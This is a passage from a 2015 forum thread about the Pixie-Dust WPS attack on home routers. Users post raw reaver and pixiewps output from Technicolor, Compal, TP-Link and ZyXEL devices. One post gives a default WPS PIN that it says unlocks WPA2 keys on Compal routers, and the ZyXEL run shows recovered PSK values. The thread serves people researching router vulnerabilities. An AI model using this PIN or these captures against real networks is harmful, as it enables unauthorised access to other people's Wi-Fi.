[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Technicolor
[P] WPS Model Number: Technicolor TD5
[P] Access Point Serial Number: 1209A1D12783
[P] PKR: 2f:97:c1:c5:de:cd:d7:b5:15:ef:8d:bb:e1:53:7c:9f:5c :3d:d2:48:63:a2:d2:ec:1b:88:69:27:44:d2:be:4f:b6:a 6:b8:07:5b:10:8c:a1:a7:01:ea:b7:f0:71:a9:90:31:78: f4:16:8f:4b:6b:0a:89:48:70:18:ad:93:f7:a7:4f:46:37 :ee:50:cb:64:5f:c6:ec:a4:10:5f:ef:a5:90:0c:3b:e3:b 3:50:e9:2a:6b:ea:ce:b4:c4:7f:51:be:ae:59:45:a8:17: a3:8e:9f:6a:05:9e:6f:8b:76:c4:30:9f:bc:c1:b6:76:2b :6d:dd:4e:3b:26:6c:c9:f5:eb:c6:49:eb:9d:a3:ae:64:5 a:f5:87:88:46:ff:30:3e:87:1a:e0:12:89:81:7f:6e:f3: a2:8b:f5:66:47:66:ab:71:0b:1f:4d:de:9f:d9:d7:c4:cc :c5:73:65:93:75:dd:89:ec:43:b0:2e:7e:51:46:1f:79:e e:70:4b:de:26:8a:21:6c:99
[P] AuthKey: f1:63:8a:98:70:5b:6b:9b:fc:e5:f7:69:c9:a8:fd:01:9c :b8:81:e9:c7:07:44:60:98:f1:c1:70:62:d0:65:f4
[P] E-Nonce: 5f:a2:06:2d:1c:01:6b:cc:67:7e:f6:e7:53:df:38:01
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Technicolor
[P] WPS Model Number: Technicolor TD5
[P] Access Point Serial Number: 1209A1D12783
[P] PKR: 1e:4c:22:6d:a7:ce:f8:b7:d0:16:83:76:33:6b:8f:4f:b1 :9e:6c:8a:a6:7d:6a:4a:14:8e:4e:5b:2e:fa:e5:4e:a1:b 2:d0:a0:65:75:16:a6:10:60:27:8d:31:74:4b:e1:4e:0e: 18:2d:f2:ae:10:3f:2f:14:ff:51:75:24:8b:d3:6a:a4:23 :72:7d:d8:bb:63:6b:89:c9:22:0f:32:e3:1b:bb:2b:b6:3 c:8a:b3:4f:c7:a1:4b:fc:d2:4c:73:9c:1d:3f:ae:6d:aa: 3f:f0:a0:84:51:e2:1f:ca:91:f5:89:44:47:48:3c:23:6e :e0:b5:22:f3:c7:9c:db:3f:91:82:78:9f:73:4a:dd:38:0 0:f4:ee:a9:4f:ce:4a:4c:e8:3f:87:9f:e6:3a:a9:07:90: 31:05:09:a7:7d:3f:e6:03:70:44:61:f8:20:cc:47:c3:15 :dd:50:52:54:ee:99:c4:85:7e:8a:64:8f:0f:60:16:3a:e d:3c:8d:d9:17:3e:ca:22:62
[P] AuthKey: f7:94:e0:53:05:c6:92:37:13:8c:d8:04:54:3a:42:5e:5f :8f:4f:28:ae:7a:51:9e:91:3e:69:e8:f6:c8:68:43
[P] E-Hash1: 51:6d:e5:bc:37:d0:ae:bb:de:b8:6d:91:40:b4:55:1a:c0 :15:a1:32:29:1a:c3:66:9f:3e:6f:38:39:3c:ee:95
[P] E-Hash2: c5:e2:df:28:ed:50:8d:69:31:e9:85:9e:1b:68:12:18:cf :c7:1f:f7:f8:41:f4:01:b3:5a:8e:83:a3:24:9e:96
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 1 s

So we're waiting for a new update of Pixie, and I hope it'll be very soon...

Frost.Elrick
2015-04-24, 19:30
pixiewps inst installing.
it shows problem in line 46:26
after that it also halts on 'SHA1' line.
any way to solve it...???
im running kali in live

someone_else
2015-04-25, 00:52
some updates for the database ;-)


Compal CH6640E
Realtek RTL8192CE
After successful PIN-Test reaver brings for PSK + SSID "(null)" ?
So, what else, its some kind of VULNERABLE ;).


[P] E-Nonce: 07:ee:41:56:16:0a:54:d7:0d:c7:1e:a9:43:83:c1:a0
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: c6:5a:4c:48:87:b9:24:fb:b3:f8:0f:de:b4:4c:cc:82:23 :cf:6c:55:2b:4c:d8:a3:a8:c8:a8:da:aa:ba:28:ab:c8:9 5:d1:aa:04:a2:10:f8:01:31:62:40:46:e0:cc:a8:6c:07: 9a:8c:5f:5c:1e:c5:13:53:c7:69:cc:55:ce:0a:de:38:27 :a1:9c:75:e5:09:e9:55:71:5e:60:3d:e7:a4:6f:88:60:4 e:da:8e:de:c3:74:48:fb:ad:8a:16:77:2b:0d:4f:d6:cc: 5d:85:0e:59:44:a9:de:3f:85:a1:49:80:ec:88:79:b2:4e :00:8a:6b:a5:db:27:62:3c:59:d8:e9:8f:f4:3e:09:76:7 4:5f:10:99:d1:33:39:69:a7:c6:2a:aa:60:29:1b:9c:5f: 4f:d4:b2:a2:08:cd:67:d0:de:59:12:be:24:9e:69:6e:f0 :a7:6b:70:2d:4f:db:5a:b5:cb:36:2b:44:4a:c7:e0:42:5 0:a8:6c:d4:a5:da:e4:46:51
[P] AuthKey: a1:3d:2a:8b:ce:3a:27:e2:09:11:f8:63:e4:95:c1:c9:18 :0e:2a:9b:fa:f1:06:b4:88:a0:d4:63:98:04:44:f5
[P] E-Hash1: 5c:b7:48:b9:b2:cc:1f:5b:17:5b:f3:c6:ce:ca:83:c1:9e :c2:08:f6:bf:35:de:3f:cd:0f:34:80:b9:6e:16:51
[P] E-Hash2: 45:2a:e1:1e:2e:f7:c9:9d:a2:7a:c3:d8:c0:02:0e:aa:2d :f8:18:2d:28:61:78:93:bd:e2:a2:09:31:f3:f5:1e

@Soxrok2212
some Information about the Compal-Device. Testet with 8 Devices, each of them has the same Pin 47385580 which leads (with friendly Help from Bully) to the correct WPA2-Key (which was different in all 8 cases). :confused:

soxrok2212
2015-04-25, 01:22
Do me a favor, because this isn't the first time I've seen such a thing. Log into one of them and look under the WPS settings... tell me if a different PIN is also listed there and then try it in reaver/bully :) Please :)

someone_else
2015-04-25, 12:23
Do me a favor, because this isn't the first time I've seen such a thing. Log into one of them and look under the WPS settings... tell me if a different PIN is also listed there and then try it in reaver/bully :) Please :)

Hi,
checked three of them, each one has as Default-PIN 47385580 in WPS Settings.
For 7 Models with Reaver --> PSK + SSID "(null)", only one shows SSID and PSK. Bully delivers both Values correctly.
Btw: In your Pixie-Database is a second Compal-Device listed (CBN-106-145-065). Those CBN-xxx-xxx-xxx number is different at each Router i've tested. So its probably the same Model.

Here are 5 of them:


[P] E-Nonce: 74:d4:79:d4:5f:37:5d:a2:55:95:b3:8e:3e:b4:42:b0
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: b7:b5:92:8b:37:23:d1:97:30:cc:fd:86:06:88:40:05:ee :d9:d3:50:9e:4b:04:1a:c7:ce:2a:43:73:69:79:74:eb:c a:03:4d:c4:01:c2:1d:2d:54:df:11:89:ad:23:6b:63:15: c0:d2:80:32:29:38:a8:3f:27:34:85:8e:7e:f3:5d:48:1d :51:3f:36:3d:fa:0b:bf:3e:4c:69:9c:0e:15:ed:0c:f2:0 6:39:a6:44:df:07:26:0d:c3:97:f8:02:9f:3c:c0:7c:ae: e1:63:82:f3:e6:11:7c:08:86:cd:11:17:28:d3:df:fe:ea :9a:bf:b6:04:23:62:a9:69:52:2c:be:f8:47:84:b8:29:1 e:34:ab:ae:73:e5:b2:5c:d9:7e:15:0a:67:4f:9e:b8:f5: ab:02:6c:42:51:70:f9:75:17:1f:0b:14:9b:2b:47:15:7f :0c:c7:93:f1:bc:55:21:fe:7e:e7:43:17:f3:dd:28:3c:3 f:09:a8:f9:e5:2b:30:46:a0
[P] AuthKey: 17:c4:8c:1c:30:2d:b7:07:95:19:7e:d7:dc:cb:c5:c2:54 :31:c2:98:81:4c:e3:61:7e:6e:1f:8e:01:44:af:41
[P] E-Hash1: 29:ee:d1:39:09:2f:ed:6c:b6:fe:3f:d9:7e:65:42:1a:a9 :bb:5f:09:92:5f:4a:13:de:71:15:0c:39:62:f7:b2
[P] E-Hash2: ad:14:f5:b9:34:99:c7:99:17:2f:b2:d4:fb:d2:52:af:dc :04:61:54:69:d6:a3:47:55:e8:20:37:d2:23:7c:7a


[P] E-Nonce: 76:fd:23:67:28:98:00:14:74:08:2c:e2:58:e6:08:7b
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: f1:0e:83:37:1e:6d:29:4a:ef:30:56:56:ef:75:6c:e4:b9 :43:e1:27:e6:e8:52:cd:ed:e3:fa:9f:0d:08:15:bc:90:a c:94:2f:c9:85:c3:0d:f3:3b:cb:56:ad:5d:74:01:05:1c: 9e:43:60:74:62:79:0e:5e:6d:b5:5e:e6:06:b6:8c:b5:7e :d0:eb:ed:17:6a:76:ca:aa:c2:f5:0e:8c:b7:da:e6:3a:b a:f9:1d:04:34:92:fc:91:0c:8c:e5:bb:70:58:22:95:34: 85:54:ba:c3:cb:d7:c6:3e:65:d1:0f:91:0d:b9:d2:98:cc :a8:25:db:d8:0a:c9:f0:40:5f:4c:36:84:1a:f6:83:3a:5 b:82:1e:44:d0:be:b8:29:ad:1f:0d:8b:bb:29:b8:7f:4d: 12:0f:c7:c6:50:b0:2b:97:16:4a:89:b5:7c:cd:06:ab:03 :59:4d:fe:3c:b9:7e:35:24:fc:24:b2:4a:67:c8:3c:b3:6 e:7b:45:e9:d2:36:bf:02:9f
[P] AuthKey: 5a:90:d3:1a:7f:0a:24:a5:3d:29:47:c5:b9:ca:65:83:86 :e0:9a:76:75:3c:47:e3:28:b6:1c:33:95:1e:ee:e4
[P] E-Hash1: 7b:ff:91:d0:ca:6f:c1:c6:c0:fb:5f:a6:21:27:54:1b:1b :1f:60:82:53:8f:26:f7:d8:55:4d:1e:49:1a:6a:6e
[P] E-Hash2: 79:8f:b2:12:da:68:b0:3d:89:8b:80:b3:43:cb:9f:f0:2c :c2:50:ec:30:dd:19:78:8d:b7:83:a0:27:df:5d:eb


[P] E-Nonce: 45:2a:2b:5c:25:9d:91:39:42:e9:38:7c:7a:d1:1b:1c
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: ac:1c:fa:9e:2a:80:76:e8:40:44:ff:9e:a3:6a:3a:c0:6d :8b:92:53:bf:98:ae:7a:22:60:c5:22:3f:40:a3:aa:16:1 9:37:76:dc:5f:49:67:ac:2b:4d:a6:b1:3e:87:7c:a4:b0: 3b:55:56:88:75:b5:a9:e6:a9:55:c0:26:eb:68:f7:5d:84 :06:c7:77:e5:55:fa:49:fe:45:03:84:2c:5d:bc:b9:76:9 9:f8:93:32:73:2c:2a:a7:0d:eb:1d:4c:3d:2a:7e:a7:a0: 62:ee:51:1a:f8:39:f5:33:40:71:1b:10:18:39:da:27:b4 :5b:3a:75:6e:86:45:92:a1:df:fe:75:2a:27:98:28:1e:a 7:cc:a9:b3:58:2d:c8:14:33:80:55:3d:ac:f0:bf:65:a7: 05:f3:6d:90:2c:0e:4f:29:95:b7:dc:49:f9:58:9e:1c:7d :d8:07:d7:c1:f3:8c:4b:4d:98:a1:0d:01:0e:5a:4d:66:2 6:09:73:d1:02:03:f7:16:8c
[P] AuthKey: 5a:3d:0b:a3:41:42:b2:8f:18:35:1f:a9:b3:be:45:1f:ef :a7:0d:32:f0:3d:06:59:51:bb:8a:b2:e1:26:eb:5f
[P] E-Hash1: b3:a9:37:ba:30:37:d7:65:d0:6e:5e:93:a1:60:0f:9f:7d :2f:f6:7c:1b:80:3e:72:84:fa:84:5b:9d:63:0f:06
[P] E-Hash2: 98:16:a7:fc:8c:0c:ce:1c:2c:58:dd:8e:1b:b1:92:ac:ca :4b:56:df:9e:0c:d3:9c:89:da:e7:7f:90:9e:83:d3


[P] E-Nonce: 14:d1:e7:b1:50:ea:91:a3:0f:8b:e5:97:63:61:ef:3c
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: f5:a3:7d:0a:de:b7:c1:a1:ea:16:72:04:be:41:a6:7b:d6 :ce:52:d1:7c:7f:42:51:f9:7d:04:6d:97:4c:97:0b:6b:1 8:02:fa:be:8a:3e:0c:aa:a1:82:b7:dd:3b:9b:e3:c8:60: 13:b6:8f:e8:c9:8f:69:2b:49:1c:e6:53:c8:1e:af:03:4f :d7:d1:1c:a4:52:96:91:18:66:45:6c:0b:29:61:c4:8b:1 3:71:d5:ee:bd:53:19:63:6e:65:3d:47:5e:ed:73:75:15: 39:b2:e8:13:69:fd:3c:0f:b1:e3:17:53:1a:84:93:33:81 :64:01:9b:d5:99:0f:c4:a2:20:63:1e:d6:15:2b:36:f8:e 0:11:ef:3a:3d:8a:b9:71:78:a1:49:a2:be:23:83:79:bd: d8:8e:8a:90:21:ce:4a:c9:08:07:b8:b7:cf:e4:0d:2c:bd :9e:38:bd:48:13:97:02:72:ef:b6:95:22:82:b5:e0:ff:b a:a4:4c:f1:93:69:90:d5:27
[P] AuthKey: 44:65:47:ff:b9:02:fe:58:58:16:54:30:15:a5:10:c1:50 :1c:04:3c:d6:d2:07:a5:73:54:93:a8:0b:4b:3b:90
[P] E-Hash1: 3a:4b:c9:1c:51:f9:6a:c5:26:3c:ba:41:2d:06:c9:62:85 :4a:5f:6a:16:17:a5:40:9a:6e:b6:13:1b:48:01:28
[P] E-Hash2: db:00:8d:a9:86:2f:14:12:4a:ee:23:e3:50:8b:1a:d3:c4 :da:39:09:d8:55:07:7d:53:a3:3f:19:3e:ce:65:1c


[P] E-Nonce: 3c:d0:62:c2:3b:83:41:84:5a:bc:d5:92:40:b4:ac:45
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: 8b:19:f7:8c:50:67:a3:b9:ec:61:ba:b1:a6:e5:6b:94:37 :89:46:b3:3c:68:62:16:57:bc:f6:00:fe:20:a6:63:82:6 5:f5:ac:c0:29:96:89:d0:03:8d:ed:06:b2:f7:28:00:5d: 6b:fc:76:d0:f6:1c:53:a4:17:46:9b:f9:64:69:bd:a4:0e :bd:b7:32:fc:a7:7c:cc:2f:dc:2e:73:45:71:b7:46:82:4 d:ec:ab:5e:d9:04:1d:a6:a0:12:63:5e:a8:da:ee:2f:15: d7:6b:9e:23:51:2b:bd:f3:a0:4d:53:55:b0:8b:a8:8f:e5 :ec:cd:8b:c6:b3:7f:a0:8d:9a:4d:ea:7b:b9:5c:a2:0b:c d:f7:b7:4c:ad:c8:0c:b6:c4:21:c2:4e:91:b9:19:13:65: 1c:9a:bb:0e:b5:f7:3f:92:eb:c3:4b:21:11:47:31:2a:46 :06:2f:4e:9a:0d:2a:0c:37:67:17:a8:0f:06:b2:1f:19:c 6:f7:25:7f:c1:c0:16:0f:48
[P] AuthKey: 0c:a1:7a:6a:da:34:42:18:96:8d:dd:8d:61:98:05:a2:ac :6f:15:4f:2c:8b:70:d3:54:2f:c2:32:06:db:52:96
[P] E-Hash1: 29:c1:bb:a1:23:c4:69:fa:0d:56:46:98:61:51:c0:8f:60 :fb:fd:5f:0f:d1:d0:1a:df:56:d1:d5:12:e7:71:5d
[P] E-Hash2: 62:0b:ad:55:b2:3d:1d:b8:bf:e4:39:27:59:1d:43:47:12 :3f:82:22:66:32:87:7a:a8:ec:c2:52:0b:13:f2:b6

soxrok2212
2015-04-25, 14:09
Alright thanks... there was no other pin listed?

Saydamination
2015-04-25, 14:14
.

Now , I have an information about F8:1A:67:XX:XX:XX mac adress (RTL 8671 ev 2006 07 27 chipset of TPLINK modems)

This mac adresses are mask ...F8:1A:67 is mask , FA:1A:67 orjinal mac..

someone_else
2015-04-25, 16:13
Alright thanks... there was no other pin listed?

nope. Don't know, if this is ISP/Country specific, but (again) all testet Routers have the same PIN.

Here (http://www.ktech.no/CG6640E_User_Guide_English.pdf) is the User-Manual, the WPS Menu is described on page 50.

wn722
2015-04-26, 06:51
if it's any use for anyone

TP-LINK TL-WR841ND v8.x
WI1 chip1: Atheros AR9341



[P] E-Nonce: b0:74:6b:86:dd:ed:47:b7:63:2b:4c:12:12:d5:c1:4e
[P] PKE: cb:8b:ce:5a:3e:49:e1:f6:02:75:c2:cb:c4:cd:bb:48:1e :a0:e8:ea:95:85:c3:62:6c:c1:ec:e3:58:01:54:8b:55:f 2:34:59:34:4a:3d:22:26:44:76:42:60:b8:a2:41:40:38: db:17:b1:0d:92:81:f5:c2:31:b4:d9:b1:50:41:70:5b:ce :58:34:3c:83:7a:99:26:66:da:be:6b:ab:87:45:ea:2a:b 3:11:9a:b0:de:73:df:9f:65:24:3d:75:cd:f7:63:8a:d7: 9f:21:ae:60:63:fd:1c:0a:62:e1:6c:63:cc:4a:63:1a:aa :e3:28:c5:88:d7:7e:49:53:1b:be:7a:2c:d7:2c:1b:bf:7 2:74:29:3e:5a:77:e7:ad:55:bd:84:6b:dd:0a:56:81:ce: e4:10:d0:ab:16:9a:2a:f8:bc:92:52:30:4f:f1:74:9e:48 :fd:2e:ea:01:de:f9:96:3d:75:67:c5:74:53:c2:37:06:1 3:8e:5f:c5:59:15:28:15:dc
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 8.0
[P] WPS Model Serial Number: 1.0
[+] Received M1 message
[P] PKR: 5c:a1:2f:f5:aa:4f:24:c2:c4:9b:b1:75:23:0b:66:63:50 :d0:d3:33:7e:6d:28:01:1d:13:e4:04:d6:22:1b:a8:51:d 9:33:fe:26:a6:00:f2:b0:b6:ef:fd:ea:8f:00:f9:23:ac: 4a:a1:ec:ad:86:56:cf:62:2d:ea:74:f6:02:47:5f:e2:05 :1c:19:2b:26:e0:33:fb:aa:3e:cc:e7:5f:4e:5f:f1:4f:c 6:ff:71:ef:79:e1:ae:df:9c:4e:44:15:16:90:09:88:ba: 0c:86:8e:87:12:13:d9:f6:ca:ac:d8:2b:be:41:8f:56:59 :1b:12:22:16:e0:17:69:ee:9c:ce:c8:e4:b7:ca:1f:9c:7 1:8f:b0:2f:0e:c2:7d:80:41:ec:ed:d5:7c:d1:e8:0f:1d: 36:0d:19:48:f1:71:e8:51:d4:31:87:d4:25:47:d9:2b:05 :a6:44:0e:19:8c:fa:a9:96:3e:78:95:65:16:87:b3:7f:9 8:92:da:15:9c:5f:f5:44:f2
[P] AuthKey: 6d:ad:39:70:41:85:d1:99:b2:c2:be:62:67:7b:2e:cb:be :ff:b2:d1:23:e3:63:0a:fb:1d:6c:75:ad:9b:82:84
[+] Sending M2 message
[P] E-Hash1: 3b:1c:a3:7d:df:eb:90:b0:af:20:bd:72:82:6a:ab:01:3e :93:39:22:10:ff:a2:07:59:c3:ba:00:31:3a:3c:f5
[P] E-Hash2: ae:a5:9e:bc:13:53:aa:ce:7f:38:27:50:33:72:1a:c7:53 :17:a1:59:12:57:e2:df:95:23:a0:4c:80:09:16:cd
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 1 s

wn722
2015-04-26, 08:36
Zyxel Keenetic vulnerable
unknown chpset



[P] E-Nonce: 18:31:5b:b2:69:e3:1a:c1:55:8f:e5:6d:7d:41:9b:3b
[P] PKE: 71:51:cd:92:d8:61:05:50:1e:15:15:6b:f1:a9:d8:5b:49 :cf:a0:9e:9d:00:2a:7a:21:91:94:0e:ac:15:d3:44:58:2 f:c8:61:3d:ce:f8:48:da:f6:ff:68:c2:8b:b5:20:61:e1: 5d:8c:f2:57:60:a7:8f:3a:32:bf:69:5f:24:cc:e4:70:33 :7f:12:3d:c6:88:02:ea:78:6b:9d:64:3f:b0:9d:68:65:e 4:25:4e:e3:26:ab:73:ae:ea:b2:1c:6d:c6:b9:99:e0:7c: ea:18:56:3a:86:90:6e:78:a6:ea:6c:f6:6e:04:96:39:ef :04:2e:30:bc:96:c6:9f:1d:50:eb:82:a8:77:b6:b0:7b:4 3:bc:a6:57:75:62:93:64:7e:15:9d:14:96:e2:4c:9e:3c: 71:31:ad:b9:e6:f5:5e:fe:98:85:ab:9e:3c:b3:d4:4d:5b :76:b6:f0:74:7b:ca:8c:d7:45:cc:b3:e6:93:a8:43:f8:1 b:aa:f2:8c:35:47:68:cc:1b
[P] WPS Manufacturer: ZyXEL Communications Corp.
[P] WPS Model Number: KEENETIC series
[P] WPS Model Serial Number: none
[+] Received M1 message
[P] PKR: 62:dd:72:61:8b:fe:85:22:81:e5:2f:33:0f:e7:07:c3:a1 :97:62:d7:69:7a:7d:dd:c6:1d:af:cf:f4:b5:83:31:42:6 a:21:69:ec:d5:0a:15:16:ee:76:bf:9f:a7:fb:01:dd:64: ee:c7:42:41:f9:25:dd:ee:2c:88:9a:1e:3e:fa:a1:bb:97 :8d:4a:33:25:d4:ff:f1:83:93:fe:98:c8:6a:90:2a:b0:f 3:76:aa:6a:31:d5:18:16:dd:75:93:b9:e3:b9:39:4e:c8: ce:01:82:58:14:30:d8:92:af:6d:b4:69:29:ec:4b:52:e7 :83:5c:3d:ae:a8:73:38:55:ac:87:76:85:c3:e8:8e:bd:f f:d9:b0:c1:3b:06:37:89:6e:ec:2b:75:24:1f:89:56:6d: 79:27:9f:c9:02:00:32:b7:71:cf:ec:08:af:bc:ff:46:1f :aa:7d:c6:d6:bf:8d:b0:d2:ac:a9:02:ba:88:45:69:fc:8 1:fb:59:eb:15:bb:4a:23:44
[P] AuthKey: 9d:25:78:e1:27:48:12:fa:97:5f:aa:6f:3a:68:d2:86:3f :62:ec:c7:51:a1:df:02:87:f9:48:fd:56:fc:67:08
[+] Sending M2 message
[+] Received M1 message
[P] E-Hash1: 3e:08:b5:6b:9b:bd:cd:2e:07:b6:0b:76:ba:99:97:1a:f4 :d9:38:11:09:f4:af:8c:3c:cd:dd:19:94:d7:b4:a7
[P] E-Hash2: c4:39:a8:b6:3b:67:80:32:0f:1c:62:f7:40:d8:4d:85:9f :02:e7:fc:5a:4a:85:a6:e8:8f:5b:0d:aa:55:b0:09
[Pixie-Dust]
[Pixie-Dust] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] PSK1: 7a:a9:99:5e:00:60:98:fd:91:37:2c:e9:f4:1c:67:11
[Pixie-Dust] PSK2: ce:81:5a:1b:39:ce:c3:07:86:59:21:71:0c:f4:a6:31
